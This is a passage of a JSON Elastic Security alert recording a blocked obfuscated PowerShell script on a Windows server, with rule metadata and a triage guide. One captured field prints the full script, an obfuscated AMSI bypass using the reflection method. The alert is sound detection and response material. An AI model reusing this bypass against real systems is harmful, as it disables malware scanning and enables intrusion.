| ], | |
| "kibana.alert.ancestors.type": [ | |
| "event" | |
| ], | |
| "Events.host.os.type": [ | |
| "windows" | |
| ], | |
| "Events.process.code_signature.subject_name": [ | |
| "Microsoft Windows" | |
| ], | |
| "signal.ancestors.index": [ | |
| ".ds-logs-endpoint.alerts-default-2025.09.24-000002" | |
| ], | |
| "user.name": [ | |
| "Administrator" | |
| ], | |
| "Events.process.Ext.code_signature.subject_name": [ | |
| "Microsoft Windows" | |
| ], | |
| "kibana.alert.original_data_stream.dataset": [ | |
| "endpoint.alerts" | |
| ], | |
| "Endpoint.policy.applied.artifacts.global.version": [ | |
| "1.0.1638+2025-10-13-daily" | |
| ], | |
| "Events.host.os.Ext.variant": [ | |
| "Windows Server 2019 Standard" | |
| ], | |
| "signal.original_event.id": [ | |
| "OCsWZ8Jp4Gz3668A++++g348" | |
| ], | |
| "Endpoint.policy.applied.artifacts.global.snapshot": [ | |
| "latest" | |
| ], | |
| "Events.event.category": [ | |
| "api" | |
| ], | |
| "user.domain": [ | |
| "WIN-SVR-2019-ST" | |
| ], | |
| "process.Ext.token.integrity_level_name": [ | |
| "high" | |
| ], | |
| "signal.original_event.type": [ | |
| "info", | |
| "denied" | |
| ], | |
| "kibana.alert.rule.note": [ | |
| "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Endpoint Security (Elastic Defend)\n\nElastic Defend is a robust endpoint security solution that monitors and protects systems by analyzing events and generating alerts for suspicious activities. Adversaries may exploit endpoints by executing unauthorized code or manipulating system processes. The detection rule leverages event data to identify alerts from Elastic Defend, focusing on potential threats while excluding non-relevant modules, thus enabling timely investigation of endpoint anomalies.\n\n### Possible investigation steps\n\n- Review the alert details to understand the specific event.kind:alert and event.module: endpoint that triggered the alert, ensuring it is not related to the excluded endgame module.\n- Examine the timeline of events leading up to the alert to identify any unusual or unauthorized activities, such as unexpected process executions or system changes.\n- Correlate the alert with other security events or logs from the same endpoint to gather additional context and determine if there is a pattern of suspicious behavior.\n- Investigate the source and destination of any network connections associated with the alert to identify potential command and control activity or data exfiltration attempts.\n- Check for any recent changes or updates to the endpoint's software or configuration that could explain the alert, ensuring they are legitimate and authorized.\n- Assess the risk score and severity of the alert in conjunction with other alerts from the same endpoint to prioritize the investigation and response efforts.\n\n### False positive analysis\n\n- Alerts triggered by routine software 
updates can be false positives. Users can create exceptions for known update processes to prevent unnecessary alerts.\n- System maintenance activities, such as scheduled scans or backups, may generate alerts. Exclude these activities by identifying their specific event signatures and adding them to the exception list.\n- Legitimate administrative actions, like remote desktop sessions or script executions by IT staff, might be flagged. Define exceptions for these actions by correlating them with authorized user accounts or IP addresses, but scope them narrowly: an administrative account or a trusted source address is not by itself evidence that the activity is benign, since attackers routinely operate from compromised privileged accounts.\n- Frequent alerts from non-malicious applications that interact with system processes can be excluded by adding exceptions for these applications, preferably keyed on their file hash or code-signing identity rather than on executable path alone, since a path can be reused by an attacker.\n- Network monitoring tools that simulate attack patterns for testing purposes may trigger alerts. Exclude these tools by specifying their known behaviors and IP ranges in the exception settings.\n\n### Response and remediation\n\n- Isolate the affected endpoint immediately to prevent further unauthorized access or lateral movement within the network.\n- Analyze the alert details to identify the specific unauthorized code or process manipulation involved, and terminate any malicious processes identified.\n- Remove any unauthorized code or files from the affected endpoint, ensuring that all traces of the threat are eradicated.\n- Conduct a thorough review of system logs and event data to identify any additional indicators of compromise or related suspicious activities.\n- Update endpoint security configurations and signatures to prevent similar threats from exploiting the same vulnerabilities in the future.\n- Restore the affected endpoint from a known good backup if necessary, ensuring that the system is free from any residual threats.\n- Escalate the incident to the security operations center (SOC) or relevant team for further analysis and to determine if additional systems may be affected." | |
| ], | |
| "kibana.alert.rule.max_signals": [ | |
| 1000 | |
| ], | |
| "signal.rule.author": [ | |
| "Elastic" | |
| ], | |
| "kibana.alert.rule.risk_score": [ | |
| 47 | |
| ], | |
| "process.code_signature.status": [ | |
| "trusted" | |
| ], | |
| "signal.original_event.dataset": [ | |
| "endpoint.alerts" | |
| ], | |
| "kibana.alert.rule.consumer": [ | |
| "siem" | |
| ], | |
| "kibana.alert.rule.category": [ | |
| "Custom Query Rule" | |
| ], | |
| "event.action": [ | |
| "rule_detection" | |
| ], | |
| "event.ingested": [ | |
| "2025-10-14T15:22:06.000Z" | |
| ], | |
| "@timestamp": [ | |
| "2025-10-14T15:22:17.361Z" | |
| ], | |
| "kibana.alert.original_event.action": [ | |
| "rule_detection" | |
| ], | |
| "kibana.alert.original_event.agent_id_status": [ | |
| "verified" | |
| ], | |
| "data_stream.dataset": [ | |
| "endpoint.alerts" | |
| ], | |
| "signal.rule.timestamp_override": [ | |
| "event.ingested" | |
| ], | |
| "kibana.alert.rule.execution.uuid": [ | |
| "f57614b2-41d6-4d61-bba2-ed5d8a040f12" | |
| ], | |
| "kibana.alert.uuid": [ | |
| "f5416543d2a90170e669a1304a4a3afd73311220b52072064b09c619f5e31659" | |
| ], | |
| "signal.rule.note": [ | |
| "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Endpoint Security (Elastic Defend)\n\nElastic Defend is a robust endpoint security solution that monitors and protects systems by analyzing events and generating alerts for suspicious activities. Adversaries may exploit endpoints by executing unauthorized code or manipulating system processes. The detection rule leverages event data to identify alerts from Elastic Defend, focusing on potential threats while excluding non-relevant modules, thus enabling timely investigation of endpoint anomalies.\n\n### Possible investigation steps\n\n- Review the alert details to understand the specific event.kind:alert and event.module: endpoint that triggered the alert, ensuring it is not related to the excluded endgame module.\n- Examine the timeline of events leading up to the alert to identify any unusual or unauthorized activities, such as unexpected process executions or system changes.\n- Correlate the alert with other security events or logs from the same endpoint to gather additional context and determine if there is a pattern of suspicious behavior.\n- Investigate the source and destination of any network connections associated with the alert to identify potential command and control activity or data exfiltration attempts.\n- Check for any recent changes or updates to the endpoint's software or configuration that could explain the alert, ensuring they are legitimate and authorized.\n- Assess the risk score and severity of the alert in conjunction with other alerts from the same endpoint to prioritize the investigation and response efforts.\n\n### False positive analysis\n\n- Alerts triggered by routine software 
updates can be false positives. Users can create exceptions for known update processes to prevent unnecessary alerts.\n- System maintenance activities, such as scheduled scans or backups, may generate alerts. Exclude these activities by identifying their specific event signatures and adding them to the exception list.\n- Legitimate administrative actions, like remote desktop sessions or script executions by IT staff, might be flagged. Define exceptions for these actions by correlating them with authorized user accounts or IP addresses, and scope each exception as narrowly as possible (specific process, code signer and host): a broad user- or IP-based exception also suppresses alerts for an adversary operating under a compromised administrator account.\n- Frequent alerts from non-malicious applications that interact with system processes can be excluded by allowlisting these applications. Prefer a code-signer plus hash match over a bare path, since a path-only exception is satisfied by any payload an attacker drops into the allowed location.\n- Network monitoring tools that simulate attack patterns for testing purposes may trigger alerts. Exclude these tools by specifying their known behaviors and IP ranges in the exception settings, and remove the exception once testing is complete.\n\n### Response and remediation\n\n- Isolate the affected endpoint immediately to prevent further unauthorized access or lateral movement within the network.\n- Analyze the alert details to identify the specific unauthorized code or process manipulation involved, capture volatile evidence (process memory, command line, loaded modules) first, and then terminate any malicious processes identified.\n- Remove any unauthorized code or files from the affected endpoint, ensuring that all traces of the threat are eradicated.\n- Conduct a thorough review of system logs and event data to identify any additional indicators of compromise or related suspicious activities.\n- Update endpoint security configurations and signatures to prevent similar threats from exploiting the same vulnerabilities in the future.\n- Restore the affected endpoint from a known good backup if necessary, ensuring that the system is free from any residual threats.\n- Escalate the incident to the security operations center (SOC) or relevant team for further analysis and to determine if additional systems may be affected." | |
| ], | |
| "Endpoint.policy.applied.artifacts.user.identifiers.name": [ | |
| "endpoint-blocklist-windows-v1", | |
| "endpoint-eventfilterlist-windows-v1", | |
| "endpoint-exceptionlist-windows-v1", | |
| "endpoint-hostisolationexceptionlist-windows-v1", | |
| "endpoint-trustlist-windows-v1" | |
| ], | |
| "signal.rule.license": [ | |
| "Elastic License v2" | |
| ], | |
| "kibana.alert.rule.rule_id": [ | |
| "9a1a2dae-0b5f-4c3d-8305-a268d404c306" | |
| ], | |
| "signal.rule.type": [ | |
| "query" | |
| ], | |
| "Endpoint.policy.applied.version": [ | |
| "12" | |
| ], | |
| "Events.process.Ext.api.parameters.size": [ | |
| 3822 | |
| ], | |
| "signal.rule.rule_name_override": [ | |
| "message" | |
| ], | |
| "Events.process.Ext.code_signature.exists": [ | |
| true | |
| ], | |
| "kibana.alert.url": [ | |
| "https://samir.kb.us-central1.gcp.cloud.es.io/app/security/alerts/redirect/f5416543d2a90170e669a1304a4a3afd73311220b52072064b09c619f5e31659?index=.alerts-security.alerts-default×tamp=2025-10-14T15:22:17.361Z" | |
| ], | |
| "kibana.alert.rule.risk_score_mapping.field": [ | |
| "event.risk_score" | |
| ], | |
| "Events._label": [ | |
| "amsi_powershell_obfuscation_pattern" | |
| ], | |
| "process.pid": [ | |
| 1968 | |
| ], | |
| "signal.rule.created_by": [ | |
| "586246785" | |
| ], | |
| "signal.rule.interval": [ | |
| "1m" | |
| ], | |
| "kibana.alert.rule.created_by": [ | |
| "586246785" | |
| ], | |
| "kibana.alert.rule.timestamp_override": [ | |
| "event.ingested" | |
| ], | |
| "Events.process.entity_id": [ | |
| "Fr+lArd4jbWUm9nDJqjXuw" | |
| ], | |
| "process.code_signature.subject_name": [ | |
| "Microsoft Windows" | |
| ], | |
| "kibana.alert.rule.name": [ | |
| "Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script" | |
| ], | |
| "host.name": [ | |
| "win-svr-2019-st" | |
| ], | |
| "event.kind": [ | |
| "signal" | |
| ], | |
| "process.code_signature.trusted": [ | |
| true | |
| ], | |
| "Events.process.Ext.api.parameters.buffer": [ | |
| "$MV3l1C=$null;$rWS16tHn4=\"System.$(('Mánäg'+'èmênt').NoRmAliZE([Char](70)+[cHAR](111)+[ChaR](114+75-75)+[cHAR](65+44)+[chAr]([ByTe]0x44)) -replace [cHar](92*70/70)+[Char]([bytE]0x70)+[ChaR]([ByTE]0x7b)+[Char](77)+[chaR](108+2)+[chAR]([byTE]0x7d)).$(('Äú'+'tô'+'mä'+'tì'+'õn').NOrmaliZe([chAr](70*53/53)+[CHaR]([bytE]0x6f)+[cHaR]([BYTE]0x72)+[chAr](109)+[cHAr](10+58)) -replace [chAr](92+90-90)+[chAr]([bYTE]0x70)+[chAR](123+7-7)+[cHaR]([bYte]0x4d)+[cHAr]([bytE]0x6e)+[ChAR]([bYTe]0x7d)).$(('Á'+'m'+'s'+'î'+'Ù'+'t'+'í'+'l'+'s').nORMalIze([CHAR](14+56)+[chAR]([bYtE]0x6f)+[chAr]([bYte]0x72)+[CHaR](109*15/15)+[char]([bYtE]0x44)) -replace [CHAR](92+51-51)+[ChaR]([BYte]0x70)+[chaR]([Byte]0x7b)+[chAR]([BytE]0x4d)+[ChAR]([bytE]0x6e)+[ChaR](125))\";$igaqlsqbbrpoqjdswzgcmyrdbwdoj=\"+[chaR](99*97/97)+[CHAr]([BYTE]0x72)+[cHar]([byte]0x71)+[CHar](100+3-3)+[CHAR]([ByTE]0x65)+[Char](103*40/40)+[chAR](117*11/11)+[ChAr](115+45-45)+[cHAR](120)+[cHaR](113)+[cHAr]([BYTE]0x78)+[CHar]([bYtE]0x6b)+[Char](64+40)+[cHAR]([BYtE]0x62)+[CHAr]([BYte]0x7a)+[char](71+38)+[CHar]([byTE]0x6f)+[chAr](105*92/92)+[CHAR]([byte]0x66)+[Char](111+37-37)+[Char]([BYte]0x64)+[cHAr]([byTe]0x6a)\";[Threading.Thread]::Sleep(1873);[Ref].Assembly.GetType($rWS16tHn4).GetField($(('àmsì'+'Înít'+'Fâíl'+'êd').NOrMaLIze([CHAR](30+40)+[chAR]([BYTe]0x6f)+[char](114)+[cHar]([BYte]0x6d)+[chAr](1+67)) -replace [CHAr](44+48)+[chAR](112+105-105)+[chaR](123+92-92)+[chAr](77)+[CHAR]([Byte]0x6e)+[CHaR]([byte]0x7d)),\"NonPublic,Static\").SetValue($MV3l1C,$true);$qrxwkay=\"+[ChAr]([Byte]0x69)+[chAR]([byte]0x6e)+[ChaR]([byte]0x7a)+[cHAr]([BYTE]0x72)+[chAR](97+56-56)+[CHar]([bYtE]0x64)+[CHar](115)+[char]([bytE]0x61)+[cHAR](121)+[cHar]([BYtE]0x6e)+[chAR]([bytE]0x67)+[ChaR](98+77-77)+[CHaR](54+46)+[chAR]([bYTe]0x79)+[ChaR](61+46)+[ChAR](116)+[CHar](97*85/85)+[cHaR]([byTe]0x62)+[ChAR]([ByTE]0x6b)\";[Threading.Thread]::Sleep(1232)\n#Matt Graebers Reflection method " | |
| ], | |
| "signal.rule.created_at": [ | |
| "2025-08-25T09:37:22.832Z" | |
| ], | |
| "kibana.alert.workflow_status": [ | |
| "open" | |
| ], | |
| "Events.host.name": [ | |
| "win-svr-2019-st" | |
| ], | |
| "kibana.alert.original_event.created": [ | |
| "2025-10-14T15:21:30.576Z" | |
| ], | |
| "threat.tactic.id": [ | |
| "TA0002" | |
| ], | |
| "Events.host.os.platform": [ | |
| "windows" | |
| ], | |
| "Events.host.architecture": [ | |
| "x86_64" | |
| ], | |
| "Events.host.os.kernel": [ | |
| "1809 (10.0.17763.2061)" | |
| ], | |
| "threat.tactic.name": [ | |
| "Execution" | |
| ], | |
| "threat.technique.subtechnique.name.text": [ | |
| "PowerShell" | |
| ], | |
| "kibana.alert.reason": [ | |
| "malware, intrusion_detection event with process powershell.exe, by Administrator on win-svr-2019-st created high alert Malicious Behavior Prevention Alert: Potential Obfuscated PowerShell Script." | |
| ], | |
| "data_stream.type": [ | |
| "logs" | |
| ], | |
| "signal.ancestors.id": [ | |
| "AZnjUAfs4fyCfCR7INh3" | |
| ], | |
| "signal.original_time": [ | |
| "2025-10-14T15:21:30.576Z" | |
| ], | |
| "Responses.process.pid": [ | |
| 1968 | |
| ], | |
| "ecs.version": [ | |
| "8.10.0" | |
| ], | |
| "signal.rule.severity": [ | |
| "high" | |
| ], | |
| "event.created": [ | |
| "2025-10-14T15:21:30.576Z" | |
| ], | |
| "Responses.action.state": [ | |
| 0 | |
| ], | |
| "kibana.alert.depth": [ | |
| 1 | |
| ], | |
| "kibana.alert.rule.revision": [ | |
| 0 | |
| ], | |
| "Events.message": [ | |
| "Endpoint API event - AmsiScanBuffer" | |
| ], | |
| "signal.rule.version": [ | |
| "108" | |
| ], | |
| "kibana.alert.status": [ | |
| "active" | |
| ], | |
| "kibana.alert.last_detected": [ | |
| "2025-10-14T15:22:17.403Z" | |
| ], | |
| "Events.host.os.family": [ | |
| "windows" | |
| ], | |
| "threat.tactic.reference": [ | |
| "https://attack.mitre.org/tactics/TA0002/" | |
| ], | |
| "Events.user.domain": [ | |
| "WIN-SVR-2019-ST" | |
| ], | |
| "kibana.alert.rule.severity_mapping.field": [ | |
| "event.severity", | |
| "event.severity", | |
| "event.severity", | |
| "event.severity" | |
| ], | |
| "kibana.alert.original_event.dataset": [ | |
| "endpoint.alerts" | |
| ], | |
| "Events._state": [ | |
| 0 | |
| ], | |
| "kibana.alert.rule.rule_type_id": [ | |
| "siem.queryRule" | |
| ], | |
| "signal.rule.rule_id": [ | |
| "9a1a2dae-0b5f-4c3d-8305-a268d404c306" | |
| ], | |
| "process.executable": [ | |
| "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" | |
| ], | |
| "kibana.alert.original_event.severity": [ | |
| 73 | |
| ], | |
| "process.parent.executable": [ | |
| "C:\\Windows\\System32\\cmd.exe" | |
| ], | |
| "Events.host.os.version": [ | |
| "1809 (10.0.17763.2061)" | |
| ], | |
| "process.args_count": [ | |
| 1 | |
| ], | |
| "kibana.alert.rule.updated_at": [ | |
| "2025-08-25T09:37:22.832Z" | |
| ], | |
| "Events.event.id": [ | |
| "OCsWZ8Jp4Gz3668A++++g337" | |
| ], | |
| "data_stream.namespace": [ | |
| "default" | |
| ], | |
| "kibana.alert.rule.author": [ | |
| "Elastic" | |
| ], | |
| "process.Ext.code_signature.exists": [ | |
| true | |
| ], | |
| "Endpoint.policy.applied.endpoint_policy_version": [ | |
| "11" | |
| ], | |
| "Events.process.pid": [ | |
| 1968 | |
| ], | |
| "signal.original_event.action": [ | |
| "rule_detection" | |
| ], | |
| "kibana.alert.rule.created_at": [ | |
| "2025-08-25T09:37:22.832Z" | |
| ], | |
| "process.pe.imphash": [ | |
| "741776aaccfc5b71ff59832dcdcace0f" | |
| ], | |
| "signal.rule.to": [ | |
| "now" | |
| ], | |
| "event.type": [ | |
| "info", | |
| "denied" | |
| ], | |
| "process.command_line": [ | |
| "powershell" | |
| ], | |
| "kibana.alert.rule.execution.type": [ | |
| "scheduled" | |
| ], | |
| "Events.process.code_signature.exists": [ | |
| true | |
| ], | |
| "kibana.alert.rule.exceptions_list.id": [ | |
| "endpoint_list" | |
| ], | |
| "event.dataset": [ | |
| "endpoint.alerts" | |
| ], | |
| "kibana.alert.original_time": [ | |
| "2025-10-14T15:21:30.576Z" | |
| ] | |
| } | |
| } | 
  